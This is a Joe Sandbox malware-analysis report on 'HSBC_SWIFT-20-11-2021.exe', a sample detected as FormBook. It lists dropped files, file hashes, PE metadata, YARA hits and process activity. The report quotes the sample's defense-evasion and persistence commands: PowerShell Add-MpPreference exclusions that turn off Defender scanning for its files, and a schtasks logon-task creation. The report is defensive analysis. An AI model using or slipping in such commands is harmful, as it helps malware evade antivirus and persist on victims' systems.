              • Found application associated with file extension: .exe
              Warnings:
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SearchUI.exe, backgroundTaskHost.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, mobsync.exe, wuapihost.exe
              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, client.wns.windows.com, fs.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
              • Not all processes were analyzed; the report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
              • Report size getting too big, too many NtCreateFile calls found.
              • Report size getting too big, too many NtEnumerateKey calls found.
              • Report size getting too big, too many NtEnumerateValueKey calls found.
              • Report size getting too big, too many NtOpenFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryAttributesFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              Time | Type | Description
              18:48:50 | API Interceptor | 80x Sleep call for process: HSBC_SWIFT-20-11-2021.exe modified
              18:48:57 | API Interceptor | 72x Sleep call for process: powershell.exe modified
              18:50:16 | API Interceptor | 140x Sleep call for process: explorer.exe modified

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASN

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HSBC_SWIFT-20-11-2021.exe.log
              Process:C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe
              File Type:ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):2239
              Entropy (8bit):5.354287817410997
              Encrypted:false
              SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
              MD5:913D1EEA179415C6D08FB255AE42B99D
              SHA1:E994C612C0596994AAE55FBCE35B7A4FBE312FD7
              SHA-256:473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
              SHA-512:768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
              Malicious:false
              Preview:
              1,"fusion","GAC",0
              1,"WinRT","NotApp",1
              3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0
              3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0
              3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0
              3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0
              3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
              C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
              Process:C:\Windows\explorer.exe
              File Type:data
              Category:modified
              Size (bytes):29232
              Entropy (8bit):1.7174925014010742
              Encrypted:false
              SSDEEP:96:4Xn/EwkcovPYCckGbZQYNAY+DcExux/H2ZPzgf:0kbvrc3N3LEy/z
              MD5:9CEA85F54A98B49F9713D46001D44B3F
              SHA1:655BFE94A738ADF4510A0F07DBB76AC343E09A22
              SHA-256:B365CE9FE495AF8D436049A93F34CA1A8363439C0D8EB45EB46921519A4A0458
              SHA-512:4E30DAC95FDC5601121BBD5A02E2DCA67852E36700E56A972EBDF14872AA41B0E23BFBB96198B7C2A04D5E2275509599EB57E148716C9C57F9101A58C50E5321
              Malicious:false
              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):22276
              Entropy (8bit):5.603205624926295
              Encrypted:false
              SSDEEP:384:utCDLj1Bi1EIUkl+RMSBKnwjultI+77Y9gtSJ3xeT1MaXZlbAV7EvDWhmRZBDI+W:n41E3k14KwClthftc8C+fwAvfVM
              MD5:8022AC6DB8E130F172B0B1DFD81A75BD
              SHA1:8A5CF5649B9ABDCB791D0E79EE914A25A41E458E
              SHA-256:697F49E4F30B68C3B95A7B87338203A034077667D314430DEDCF9A95B74BD80D
              SHA-512:22AFC211C14434E845E5CF81AB29583604A511C1BDE49866B37A1F57FC9DAE9A84A67397D846B2268F0FC6E9D88EEF5931FE4200F62BA72828B3E72ED2E981D5
              Malicious:false
              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_04xvx3ge.imm.psm1
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Preview: 1
              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5azzze0s.akj.ps1
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Preview: 1
              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dpdt4pua.1fr.ps1
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Preview: 1
              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nt4teizv.av4.psm1
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Preview: 1
              C:\Users\user\AppData\Local\Temp\tmp4EB8.tmp
              Process:C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe
              File Type:XML 1.0 document, ASCII text
              Category:dropped
              Size (bytes):1611
              Entropy (8bit):5.116240184745884
              Encrypted:false
              SSDEEP:24:2di4+S2qh/S1K2ky1mo2dUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLk+xvn:cgea6YrFdOFzOzN33ODOiDdKrsuTgyv
              MD5:774E84F6AC7E66BE600BBDC7957155AC
              SHA1:1A752B132A55F7BB5287A10AAE4F104E825845F3
              SHA-256:72AAD5A5B5425BA55BAB6210181C959F71F5D9B5C205A74398D369A3D2CF8BDB
              SHA-512:6F82A8DF85B62DA11D3E26DF1BE3AE49B9E4B41FFEA11C1D6229C47D62D3D9815289CCDC02643AD75446468F9BC1E4729A6AC6A21A94730FFE61CBC4208609A7
              Malicious:true
              Preview:
              <?xml version="1.0" encoding="UTF-16"?>
              <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
                <RegistrationInfo>
                  <Date>2014-10-25T14:27:44.8929027</Date>
                  <Author>computer\user</Author>
                </RegistrationInfo>
                <Triggers>
                  <LogonTrigger>
                    <Enabled>true</Enabled>
                    <UserId>computer\user</UserId>
                  </LogonTrigger>
                  <RegistrationTrigger>
                    <Enabled>false</Enabled>
                  </RegistrationTrigger>
                </Triggers>
                <Principals>
                  <Principal id="Author">
                    <UserId>computer\user</UserId>
                    <LogonType>InteractiveToken</LogonType>
                    <RunLevel>LeastPrivilege</RunLevel>
                  </Principal>
                </Principals>
                <Settings>
                  <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
                  <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
                  <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
                  <AllowHardTerminate>false</AllowHardTerminate>
                  <StartWhenAvailable>true</StartWhenAvailab
              C:\Users\user\AppData\Roaming\RdffGefdbLSx.exe
              Process:C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):438272
              Entropy (8bit):7.8432109795537235
              Encrypted:false
              SSDEEP:12288:lH41U0XdLgxmfz9aWuIazPy03IYwr3EQZpdoyWQHzKQMixBFm:lHYU0uEr9aWTyNBwjppd1WQTAi1
              MD5:3E9BDDCD8EDE94BEB73D43D4D3446FE7
              SHA1:27723F2FB360A300DF95C22FD1D8353A5D940455
              SHA-256:4518C17E858EAAE9A38CDF5953BD7D0CAD3C3FD5FA2B9A5B84E0CAD5E8ECFC5E
              SHA-512:81FFD8D361C6809E41819F9074E7EE84E8E8ED4BD744D8C87270E26CA405BF613EA9C29247C71ED50E057B5F39BB05CBBACD78433A37426BA02EFA7063366DAB
              Malicious:true
              C:\Users\user\AppData\Roaming\RdffGefdbLSx.exe:Zone.Identifier
              Process:C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:false
              Preview: [ZoneTransfer]....ZoneId=0
              C:\Users\user\Documents\20211125\PowerShell_transcript.921702.IDbll8EJ.20211125184857.txt
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
              Category:dropped
              Size (bytes):5827
              Entropy (8bit):5.374058040185106
              Encrypted:false
              SSDEEP:96:BZhTLVNgtqDo1ZmZ1TLVNgtqDo1ZPT57jZgTLVNgtqDo1Z+KrrnZo:ubjI
              MD5:05DB53C96F655EBF6EF4CAE8E1DBEFC3
              SHA1:B72A74AE311C15631AB3AAB1E0234BE99589ACEB
              SHA-256:A56C0763BF6000D191FC20B20569FA5C41FCA4F18B22CC1BC5A6F70C7BA94965
              SHA-512:D271C3801CF15FC23B4756C2484F1D2AA692E7B82496A3FE5858F8DA58686E79F732C4E94AB6B9B042F9101C1D404D1A9B63F8557326FBDDFA84DA59382D7944
              Malicious:false
              Preview:
              **********************
              Windows PowerShell transcript start
              Start time: 20211125184859
              Username: computer\user
              RunAs User: computer\user
              Configuration Name: 
              Machine: 921702 (Microsoft Windows NT 10.0.17134.0)
              Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\RdffGefdbLSx.exe
              Process ID: 5576
              PSVersion: 5.1.17134.1
              PSEdition: Desktop
              PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1
              BuildVersion: 10.0.17134.1
              CLRVersion: 4.0.30319.42000
              WSManStackVersion: 3.0
              PSRemotingProtocolVersion: 2.3
              SerializationVersion: 1.1.0.1
              **********************
              **********************
              Command start time: 20211125184859
              **********************
              PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\RdffGefdbLSx.exe
              **********************
              Windows PowerShell transcript start
              Start time: 20211125185229
              Username: computer\user
              RunAs User: D
              C:\Users\user\Documents\20211125\PowerShell_transcript.921702.K2IUYCHw.20211125184856.txt
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
              Category:dropped
              Size (bytes):5831
              Entropy (8bit):5.396138733203896
              Encrypted:false
              SSDEEP:96:BZjTLVNGyqDo1ZCkZCTLVNGyqDo1ZmecWjZxTLVNGyqDo1ZDDGGuZB:X
              MD5:FE22AF4958E2ED64F3F431ECC096159B
              SHA1:A2FC81D82CBCC50F8917A6A7ED8AF55E881FF7C1
              SHA-256:32B36EC0073F167F8E8415BC0E858272709C6F3D9ACECF8E71E1EB6730A9CF1B
              SHA-512:6E52400245BD4F75AEA9E916E5937ACE0E70AA8C717AFED07EA7049A36394234704D20BCE7102389327F707153FE96A816BBE0A04BA3070032305A150DE1D7E4
              Malicious:false
              Preview:
              **********************
              Windows PowerShell transcript start
              Start time: 20211125184857
              Username: computer\user
              RunAs User: computer\user
              Configuration Name: 
              Machine: 921702 (Microsoft Windows NT 10.0.17134.0)
              Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe
              Process ID: 5828
              PSVersion: 5.1.17134.1
              PSEdition: Desktop
              PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1
              BuildVersion: 10.0.17134.1
              CLRVersion: 4.0.30319.42000
              WSManStackVersion: 3.0
              PSRemotingProtocolVersion: 2.3
              SerializationVersion: 1.1.0.1
              **********************
              **********************
              Command start time: 20211125184857
              **********************
              PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe
              **********************
              Windows PowerShell transcript start
              Start time: 20211125185336
              Username: computer\user
              RunAs User:

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Entropy (8bit):7.8432109795537235
              TrID:
              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              • Win32 Executable (generic) a (10002005/4) 49.78%
              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
              • Generic Win/DOS Executable (2004/3) 0.01%
              • DOS Executable Generic (2002/1) 0.01%
              File name:HSBC_SWIFT-20-11-2021.exe
              File size:438272
              MD5:3e9bddcd8ede94beb73d43d4d3446fe7
              SHA1:27723f2fb360a300df95c22fd1d8353a5d940455
              SHA256:4518c17e858eaae9a38cdf5953bd7d0cad3c3fd5fa2b9a5b84e0cad5e8ecfc5e
              SHA512:81ffd8d361c6809e41819f9074e7ee84e8e8ed4bd744d8c87270e26ca405bf613ea9c29247c71ed50e057b5f39bb05cbbacd78433a37426ba02efa7063366dab
              SSDEEP:12288:lH41U0XdLgxmfz9aWuIazPy03IYwr3EQZpdoyWQHzKQMixBFm:lHYU0uEr9aWTyNBwjppd1WQTAi1

              File Icon

              Icon Hash:00828e8e8686b000

              Static PE Info

              General

              Entrypoint:0x46c56a
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Time Stamp:0x619F4735 [Thu Nov 25 08:20:05 2021 UTC]
              TLS Callbacks:
              CLR (.Net) Version:v4.0.30319
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

              Entrypoint Preview

              Instruction
              jmp dword ptr [00402000h]
              add byte ptr [eax], al
              add byte ptr [ebp+0800000Eh], ch
              add byte ptr [eax], al

              Data Directories

              Name | Virtual Address | Virtual Size | Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6c518 | 0x4f | .text
              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6e000 | 0x5f4 | .rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x70000 | 0xc | .reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

              Sections

              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
              .text | 0x2000 | 0x6a580 | 0x6a600 | False | 0.881970200499 | data | 7.85580215694 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              .rsrc | 0x6e000 | 0x5f4 | 0x600 | False | 0.440104166667 | data | 4.21799031052 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc | 0x70000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

              Resources

              Name | RVA | Size | Type | Language | Country
              RT_VERSION | 0x6e090 | 0x364 | data | |
              RT_MANIFEST | 0x6e404 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

              Imports

              DLL | Import
              mscoree.dll | _CorExeMain

              Version Infos

              Description | Data
              Translation | 0x0000 0x04b0
              LegalCopyright | Copyright Rogers Peet
              Assembly Version | 8.0.6.0
              InternalName | UnmanagedMemoryAccess.exe
              FileVersion | 5.6.0.0
              CompanyName | Rogers Peet
              LegalTrademarks |
              Comments |
              ProductName | Biblan
              ProductVersion | 5.6.0.0
              FileDescription | Biblan
              OriginalFilename | UnmanagedMemoryAccess.exe

              Network Behavior

              No network behavior found

              System Behavior

              General

              Start time:18:48:48
              Start date:25/11/2021
              Path:C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe"
              Imagebase:0xc00000
              File size:438272 bytes
              MD5 hash:3E9BDDCD8EDE94BEB73D43D4D3446FE7
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.384226199.0000000002FC1000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.384803178.0000000003FCD000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.384803178.0000000003FCD000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.384803178.0000000003FCD000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.385092750.0000000004232000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.385092750.0000000004232000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.385092750.0000000004232000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.384521083.000000000314D000.00000004.00000001.sdmp, Author: Joe Security
              Reputation:low

              General

              Start time:18:48:54
              Start date:25/11/2021
              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe"
              Imagebase:0xd30000
              File size:430592 bytes
              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Reputation:high

              General

              Start time:18:48:55
              Start date:25/11/2021
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff61de10000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:18:48:55
              Start date:25/11/2021
              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RdffGefdbLSx.exe"
              Imagebase:0xd30000
              File size:430592 bytes
              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Reputation:high

              General

              Start time:18:48:56
              Start date:25/11/2021
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff61de10000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:18:48:56
              Start date:25/11/2021
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RdffGefdbLSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB8.tmp"
              Imagebase:0x9d0000
              File size:185856 bytes
              MD5 hash:15FF7D8324231381BAD48A052F85DF04
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:18:48:59
              Start date:25/11/2021
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff61de10000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:18:49:01
              Start date:25/11/2021
              Path:C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe
              Imagebase:0xea0000
              File size:438272 bytes
              MD5 hash:3E9BDDCD8EDE94BEB73D43D4D3446FE7
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.380797387.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.380797387.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.380797387.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.476496897.00000000017D0000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.476496897.00000000017D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.476496897.00000000017D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.381918997.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.381918997.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.381918997.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.476370956.0000000001590000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.476370956.0000000001590000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.476370956.0000000001590000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:low

              General

              Start time:18:49:08
              Start date:25/11/2021
              Path:C:\Windows\explorer.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Explorer.EXE
              Imagebase:0x7ff6f22f0000
              File size:3933184 bytes
              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.412407613.0000000007682000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.412407613.0000000007682000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.412407613.0000000007682000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.432842993.0000000007682000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.432842993.0000000007682000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
